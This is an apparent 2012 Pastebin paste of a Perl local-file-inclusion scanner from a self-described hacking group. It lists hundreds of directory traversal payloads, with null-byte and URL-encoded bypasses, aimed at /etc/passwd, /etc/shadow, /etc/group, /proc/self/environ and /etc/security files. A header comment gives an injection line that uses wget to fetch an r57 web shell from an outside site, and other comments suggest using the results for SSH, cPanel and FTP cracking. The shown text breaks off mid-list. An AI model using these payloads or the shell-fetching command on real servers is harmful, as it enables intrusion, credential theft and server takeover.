Advertisement
G3n3Rall

BHG LFI SCANNER

May 19th, 2012
117
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 69.01 KB | None | 0 0
  1. Hi Guys
  2. BHG LFI SCANNER
  3. you Can bypass LFI easily with this ;)
  4. and it have txt output too
  5.  
  6. #!/usr/bin/perl
  7.  
  8. # LFI = local file inclusion
  9. #With This Bug You Can read Some files in Linux Servers
  10. #For Example /etc/passwd
  11. #You can use it for Ssh & Cpanel & FTP Crack and ...
  12. #With /proc/self/environ  u can upload shell or run cmd =>
  13. #../../../proc/self/environ%00&cmd=wget http://www.mcrracecars.co.uk/images/r57.txt -O scroll.php
  14. #and ........
  15. #visit us => Black-hg.org  
  16. #our forum => Black-hg.org/cc
  17. #AnTi.SecurityBoy@Gmail.com
  18. #We Are : Net.Edit0r , A.Crox , 3H34N , Am!n , tHe.K!ll3r , ArYaIeIrAn , G3n3Rall , Mr.XHat , NoL1m1t , Black Viper ,Nitrojen90 .....
  19. #IRANIAN HACKERS
  20. system("cls");  # on linux replace => system("clear");
  21. use LWP::Simple;
  22. print "##############################################################################";
  23. print "\n";
  24. print "\t\t BLACK HAT GROUP LFI SCANNER [#BHG LFI SCANNER VERSION 1.1]\n";
  25. print "\t\t WWW.BLACK-HG.ORG   <<<>>> WWW.BLACK-HG.ORG/CC/";
  26. print "\n\n\t\t Code By G3n3Rall \n";
  27. print " \n";
  28. print " \n";
  29. start:;
  30. print " \t Main Menu : \n";
  31. print " \n ";
  32. print "\t\t /etc/   Directories";
  33. print " \n ";
  34. print " \n ";
  35. print "\t [1]- Scan For Passwd \n";
  36. print "\t [2]- Scan For Environ \n";
  37. print "\t [3]- Scan For Shadow  \n";
  38. print "\t [4]- Scan For Group  \n";
  39. print "\n";
  40. print "\t\t /etc/security/   Directories";
  41. print "\n";
  42. print " \n ";
  43. print "\t [5]- Scan For Security User   \n";
  44. print "\t [6]- Scan For Security Passwd  \n";
  45. print "\t [7]- Scan For Security Group  \n";
  46. print "\t [8]- Scan ALL \n";
  47. print "\t [9]- Exit \n";
  48. print "\n";
  49. print "\t \t :";
  50. $Menu =<STDIN>;
  51. if ($Menu==9) {exit;}
  52. chomp ($Menu);
  53.  
  54.  
  55.  
  56.  
  57.  
  58. @Passwd = ("/etc/passwd",
  59. "../etc/passwd",
  60. "../../etc/passwd",
  61. "../../../etc/passwd",
  62. "../../../../etc/passwd",
  63. "../../../../../etc/passwd",
  64. "../../../../../../etc/passwd",
  65. "../../../../../../../etc/passwd",
  66. "../../../../../../../../etc/passwd",
  67. "../../../../../../../../../etc/passwd",
  68. "../../../../../../../../../../etc/passwd",
  69. "/etc/passwd%00",
  70. "../etc/passwd%00",
  71. "../../etc/passwd%00",
  72. "../../../etc/passwd%00",
  73. "../../../../etc/passwd%00",
  74. "../../../../../etc/passwd%00",
  75. "../../../../../../etc/passwd%00",
  76. "../../../../../../../etc/passwd%00",
  77. "../../../../../../../../etc/passwd%00",
  78. "../../../../../../../../../etc/passwd%00",
  79. "../../../../../../../../../../etc/passwd%00",
  80. "....//etc/passwd",
  81. "....//....//etc/passwd",
  82. "....//....//....//etc/passwd",
  83. "....//....//....//....//etc/passwd",
  84. "....//....//....//....//....//etc/passwd",
  85. "....//....//....//....//....//....//etc/passwd",
  86. "....//....//....//....//....//....//....//etc/passwd",
  87. "....//....//....//....//....//....//....//....//etc/passwd",
  88. "....//....//....//....//....//....//....//....//....//etc/passwd",
  89. "....//....//....//....//....//....//....//....//....//....//etc/passwd",
  90. "....//etc/passwd%00",
  91. "....//....//etc/passwd%00",
  92. "....//....//....//etc/passwd%00",
  93. "....//....//....//....//etc/passwd%00",
  94. "....//....//....//....//....//etc/passwd%00"
  95. ,"....//....//....//....//....//....//etc/passwd%00",
  96. "....//....//....//....//....//....//....//etc/passwd%00",
  97. "....//....//....//....//....//....//....//....//etc/passwd%00",
  98. "....//....//....//....//....//....//....//....//....//etc/passwd%00",
  99. "....//....//....//....//....//....//....//....//....//....//etc/passwd%00",
  100. "%2Fetc%2Fpasswd",
  101. "..%2Fetc%2Fpasswd",
  102. "..%2F..%2Fetc%2Fpasswd",
  103. "..%2F..%2F..%2Fetc%2Fpasswd",
  104. "..%2F..%2F..%2F..%2Fetc%2Fpasswd",
  105. "..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
  106. "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
  107. "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
  108. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
  109. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
  110. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
  111. "%2Fetc%2Fpasswd%00",
  112. "..%2Fetc%2Fpasswd%00",
  113. "..%2F..%2Fetc%2Fpasswd%00",
  114. "..%2F..%2F..%2Fetc%2Fpasswd%00",
  115. "..%2F..%2F..%2F..%2Fetc%2Fpasswd%00",
  116. "..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00",
  117. "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00",
  118. "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00",
  119. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00",
  120. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00",
  121. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00",
  122. "....%2f%2Fetc/passwd",
  123. "....%2f%2F....%2f%2Fetc/passwd",
  124. "....%2f%2F....%2f%2F....%2f%2Fetc/passwd",
  125. "....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd",
  126. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd",
  127. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd",
  128. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd",
  129. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd",
  130. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd",
  131. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd",
  132. "....%2f%2Fetc/passwd%00",
  133. "....%2f%2F....%2f%2Fetc/passwd%00",
  134. "....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00",
  135. "....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00",
  136. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00",
  137. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00",
  138. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00",
  139. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00",
  140. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00",
  141. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00");
  142. ###################################################################
  143. ###################################################################
  144. @Environ = ("/proc/self/environ",
  145. "../proc/self/environ",
  146. "../../proc/self/environ"
  147. ,"../../../proc/self/environ",
  148. "../../../../proc/self/environ",
  149. "../../../../../proc/self/environ",
  150. "../../../../../../proc/self/environ",
  151. "../../../../../../../proc/self/environ",
  152. "../../../../../../../../proc/self/environ",
  153. "../../../../../../../../../proc/self/environ",
  154. "../../../../../../../../../../proc/self/environ",
  155. "/proc/self/environ%00",
  156. "../proc/self/environ%00",
  157. "../../proc/self/environ%00",
  158. "../../../proc/self/environ%00",
  159. "../../../../proc/self/environ%00",
  160. "../../../../../proc/self/environ%00",
  161. "../../../../../../proc/self/environ%00",
  162. "../../../../../../../proc/self/environ%00",
  163. "../../../../../../../../proc/self/environ%00",
  164. "../../../../../../../../../proc/self/environ%00",
  165. "../../../../../../../../../../proc/self/environ%00",
  166. "%2Fproc%2Fself%2Fenviron",
  167. "..%2Fproc%2Fself%2Fenviron",
  168. "..%2F..%2Fproc%2Fself%2Fenviron",
  169. "..%2F..%2F..%2Fproc%2Fself%2Fenviron",
  170. "..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron",
  171. "..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron",
  172. "..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron",
  173. "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron",
  174. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron",
  175. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron",
  176. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron",
  177. "%2Fproc%2Fself%2Fenviron%00",
  178. "..%2Fproc%2Fself%2Fenviron%00",
  179. "..%2F..%2Fproc%2Fself%2Fenviron%00",
  180. "..%2F..%2F..%2Fproc%2Fself%2Fenviron%00",
  181. "..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00",
  182. "..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00",
  183. "..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00",
  184. "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00",
  185. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00",
  186. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00",
  187. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00",
  188. "//proc/self/environ",
  189. "....//proc/self/environ",
  190. "....//....//proc/self/environ",
  191. "....//....//....//proc/self/environ",
  192. "....//....//....//....//proc/self/environ",
  193. "....//....//....//....//....//proc/self/environ",
  194. "....//....//....//....//....//....//proc/self/environ",
  195. "....//....//....//....//....//....//....//proc/self/environ",
  196. "....//....//....//....//....//....//....//....//proc/self/environ",
  197. "....//....//....//....//....//....//....//....//....//proc/self/environ",
  198. "....//....//....//....//....//....//....//....//....//....//proc/self/environ",
  199. "//proc/self/environ%00",
  200. "....//proc/self/environ%00",
  201. "....//....//proc/self/environ%00",
  202. "....//....//....//proc/self/environ%00",
  203. "....//....//....//....//proc/self/environ%00",
  204. "....//....//....//....//....//proc/self/environ%00",
  205. "....//....//....//....//....//....//proc/self/environ%00",
  206. "....//....//....//....//....//....//....//proc/self/environ%00",
  207. "....//....//....//....//....//....//....//....//proc/self/environ%00",
  208. "....//....//....//....//....//....//....//....//....//proc/self/environ%00",
  209. "....//....//....//....//....//....//....//....//....//....//proc/self/environ%00",
  210. "%2f%2Fproc/self/environ",
  211. "....%2f%2Fproc/self/environ",
  212. "....%2f%2F....%2f%2Fproc/self/environ",
  213. "....%2f%2F....%2f%2F....%2f%2Fproc/self/environ",
  214. "....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ",
  215. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ",
  216. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ",
  217. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ",
  218. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ",
  219. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ",
  220. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ",
  221. "%2f%2Fproc/self/environ%00",
  222. "....%2f%2Fproc/self/environ%00",
  223. "....%2f%2F....%2f%2Fproc/self/environ%00",
  224. "....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00",
  225. "....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00",
  226. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00",
  227. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00",
  228. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00",
  229. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00",
  230. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00",
  231. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00");
  232. ###################################################################
  233. ###################################################################
  234. @Shadow = ("/etc/shadow",
  235. "../etc/shadow",
  236. "../../etc/shadow",
  237. "../../../etc/shadow",
  238. "../../../../etc/shadow",
  239. "../../../../../etc/shadow",
  240. "../../../../../../etc/shadow",
  241. "../../../../../../../etc/shadow",
  242. "../../../../../../../../etc/shadow",
  243. "../../../../../../../../../etc/shadow",
  244. "../../../../../../../../../../etc/shadow",
  245. "/etc/shadow%00",
  246. "../etc/shadow%00",
  247. "../../etc/shadow%00",
  248. "../../../etc/shadow%00",
  249. "../../../../etc/shadow%00",
  250. "../../../../../etc/shadow%00",
  251. "../../../../../../etc/shadow%00",
  252. "../../../../../../../etc/shadow%00",
  253. "../../../../../../../../etc/shadow%00",
  254. "../../../../../../../../../etc/shadow%00",
  255. "../../../../../../../../../../etc/shadow%00",
  256. "%2Fetc..%2Fshadow",
  257. "..%2Fetc%2Fshadow",
  258. "..%2F..%2Fetc%2Fshadow",
  259. "..%2F..%2F..%2Fetc%2Fshadow",
  260. "..%2F..%2F..%2F..%2Fetc%2Fshadow",
  261. "..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow",
  262. "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow",
  263. "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow",
  264. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow",
  265. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow",
  266. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow",
  267. "%2Fetc..%2Fshadow%00",
  268. "..%2Fetc%2Fshadow%00",
  269. "..%2F..%2Fetc%2Fshadow%00",
  270. "..%2F..%2F..%2Fetc%2Fshadow%00",
  271. "..%2F..%2F..%2F..%2Fetc%2Fshadow%00",
  272. "..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00",
  273. "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00",
  274. "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00",
  275. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00",
  276. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00",
  277. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00",
  278. "%2F%2Fetc/shadow",
  279. "....%2f%2Fetc/shadow",
  280. "....%2f%2F....%2f%2Fetc/shadow",
  281. "....%2f%2F....%2f%2F....%2f%2Fetc/shadow",
  282. "....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow",
  283. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow",
  284. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow",
  285. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow",
  286. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow",
  287. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow",
  288. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow",
  289. "%2F%2Fetc/shadow%00",
  290. "....%2f%2Fetc/shadow%00",
  291. "....%2f%2F....%2f%2Fetc/shadow%00",
  292. "....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00",
  293. "....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00",
  294. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00",
  295. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00",
  296. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00",
  297. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00",
  298. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00",
  299. "....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00",
  300. "....//etc/shadow",
  301. "....//....//etc/shadow",
  302. "....//....//....//etc/shadow",
  303. "....//....//....//....//etc/shadow",
  304. "....//....//....//....//....//etc/shadow",
  305. "....//....//....//....//....//....//etc/shadow",
  306. "....//....//....//....//....//....//....//etc/shadow",
  307. "....//....//....//....//....//....//....//....//etc/shadow",
  308. "....//....//....//....//....//....//....//....//....//etc/shadow",
  309. "....//....//....//....//....//....//....//....//....//....//etc/shadow",
  310. "....//etc/shadow%00",
  311. "....//....//etc/shadow%00",
  312. "....//....//....//etc/shadow%00",
  313. "....//....//....//....//etc/shadow%00",
  314. "....//....//....//....//....//etc/shadow%00",
  315. "....//....//....//....//....//....//etc/shadow%00",
  316. "....//....//....//....//....//....//....//etc/shadow%00",
  317. "....//....//....//....//....//....//....//....//etc/shadow%00",
  318. "....//....//....//....//....//....//....//....//....//etc/shadow%00",
  319. "....//....//....//....//....//....//....//....//....//....//etc/shadow%00");
  320. ###################################################################
  321. ###################################################################
  322. @Group = ("/etc/group",
  323. "../etc/group",
  324. "../../etc/group",
  325. "../../../etc/group",
  326. "../../../../etc/group",
  327. "../../../../../etc/group",
  328. "../../../../../../etc/group",
  329. "../../../../../../../etc/group",
  330. "../../../../../../../../etc/group",
  331. "../../../../../../../../../etc/group",
  332. "../../../../../../../../../../etc/group",
  333. "/etc/group%00",
  334. "../etc/group%00",
  335. "../../etc/group%00",
  336. "../../../etc/group%00",
  337. "../../../../etc/group%00",
  338. "../../../../../etc/group%00",
  339. "../../../../../../etc/group%00",
  340. "../../../../../../../etc/group%00",
  341. "../../../../../../../../etc/group%00",
  342. "../../../../../../../../../etc/group%00",
  343. "../../../../../../../../../../etc/group%00",
  344. "%2Fetc..%2Fgroup",
  345. "..%2Fetc%2Fgroup",
  346. "..%2F..%2Fetc%2Fgroup",
  347. "..%2F..%2F..%2Fetc%2Fgroup",
  348. "..%2F..%2F..%2F..%2Fetc%2Fgroup",
  349. "..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup",
  350. "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup",
  351. "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup",
  352. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup",
  353. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup",
  354. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup",
  355. "%2Fetc%2Fgroup%00",
  356. "..%2Fetc%2Fgroup%00",
  357. "..%2F..%2Fetc%2Fgroup%00",
  358. "..%2F..%2F..%2Fetc%2Fgroup%00",
  359. "..%2F..%2F..%2F..%2Fetc%2Fgroup%00",
  360. "..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00",
  361. "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00",
  362. "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00",
  363. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00",
  364. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00",
  365. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00",
  366. "%2F%2Fetc/group",
  367. "....%2F%2Fetc/group",
  368. "....%2F%2F....%2F%2Fetc/group",
  369. "....%2F%2F....%2F%2F....%2F%2Fetc/group",
  370. "....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group",
  371. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group",
  372. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group",
  373. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group",
  374. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group",
  375. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group",
  376. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group",
  377. "/etc/group%00",
  378. "....%2F%2Fetc/group%00",
  379. "....%2F%2F....%2F%2Fetc/group%00",
  380. "....%2F%2F....%2F%2F....%2F%2Fetc/group%00",
  381. "....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00",
  382. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00",
  383. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00",
  384. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00",
  385. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00",
  386. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00",
  387. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00",
  388. "//etc/group",
  389. "....//etc/group",
  390. "....//....//etc/group",
  391. "....//....//....//etc/group",
  392. "....//....//....//....//etc/group",
  393. "....//....//....//....//....//etc/group",
  394. "....//....//....//....//....//....//etc/group"
  395. ,"....//....//....//....//....//....//....//etc/group"
  396. ,"....//....//....//....//....//....//....//....//etc/group",
  397. "....//....//....//....//....//....//....//....//....//etc/group",
  398. "....//....//....//....//....//....//....//....//....//....//etc/group",
  399. "//etc/group%00",
  400. "....//etc/group%00",
  401. "....//....//etc/group%00",
  402. "....//....//....//etc/group%00",
  403. "....//....//....//....//etc/group%00",
  404. "....//....//....//....//....//etc/group%00",
  405. "....//....//....//....//....//....//etc/group%00",
  406. "....//....//....//....//....//....//....//etc/group%00",
  407. "....//....//....//....//....//....//....//....//etc/group%00",
  408. "....//....//....//....//....//....//....//....//....//etc/group%00",
  409. "....//....//....//....//....//....//....//....//....//....//etc/group%00");
  410. ###################################################################
  411. ###################################################################
  412. @SecurityUser = ("/etc/security/user",
  413. "../etc/security/user",
  414. "../../etc/security/user",
  415. "../../../etc/security/user",
  416. "../../../../etc/security/user",
  417. "../../../../../etc/security/user",
  418. "../../../../../../etc/security/user",
  419. "../../../../../../../etc/security/user",
  420. "../../../../../../../../etc/security/user",
  421. "../../../../../../../../../etc/security/user",
  422. "../../../../../../../../../../etc/security/user",
  423. "/etc/security/user%00",
  424. "../etc/security/user%00",
  425. "../../etc/security/user%00",
  426. "../../../etc/security/user%00",
  427. "../../../../etc/security/user%00",
  428. "../../../../../etc/security/user%00",
  429. "../../../../../../etc/security/user%00",
  430. "../../../../../../../etc/security/user%00",
  431. "../../../../../../../../etc/security/user%00",
  432. "../../../../../../../../../etc/security/user%00",
  433. "../../../../../../../../../../etc/security/user%00",
  434. "%2Fetc%2Fsecurity%2Fuser",
  435. "..%2Fetc%2Fsecurity%2Fuser",
  436. "..%2F..%2Fetc%2Fsecurity%2Fuser",
  437. "..%2F..%2F..%2Fetc%2Fsecurity%2Fuser",
  438. "..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fuser",
  439. "..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fuser",
  440. "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fuser",
  441. "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fuser",
  442. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fuser",
  443. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fuser",
  444. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fuser",
  445. "%2Fetc%2Fsecurity%2Fuser%00",
  446. "..%2Fetc%2Fsecurity%2Fuser%00",
  447. "..%2F..%2Fetc%2Fsecurity%2Fuser%00",
  448. "..%2F..%2F..%2Fetc%2Fsecurity%2Fuser%00",
  449. "..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fuser%00",
  450. "..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fuser%00",
  451. "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fuser%00",
  452. "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fuser%00",
  453. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fuser%00",
  454. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fuser%00",
  455. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fuser%00",
  456. "....%2F%2Fetc/security/user",
  457. "....%2F%2F....%2F%2Fetc/security/user",
  458. "....%2F%2F....%2F%2F....%2F%2Fetc/security/user",
  459. "....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/user",
  460. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/user",
  461. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/user",
  462. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/user",
  463. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/user",
  464. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/user",
  465. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/user",
  466. "....%2F%2Fetc/security/user%00",
  467. "....%2F%2F....%2F%2Fetc/security/user%00",
  468. "....%2F%2F....%2F%2F....%2F%2Fetc/security/user%00",
  469. "....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/user%00",
  470. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/user%00",
  471. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/user%00",
  472. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/user%00",
  473. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/user%00",
  474. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/user%00",
  475. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/user%00",
  476. "....//etc/security/user",
  477. "....//....//etc/security/user",
  478. "....//....//....//etc/security/user",
  479. "....//....//....//....//etc/security/user",
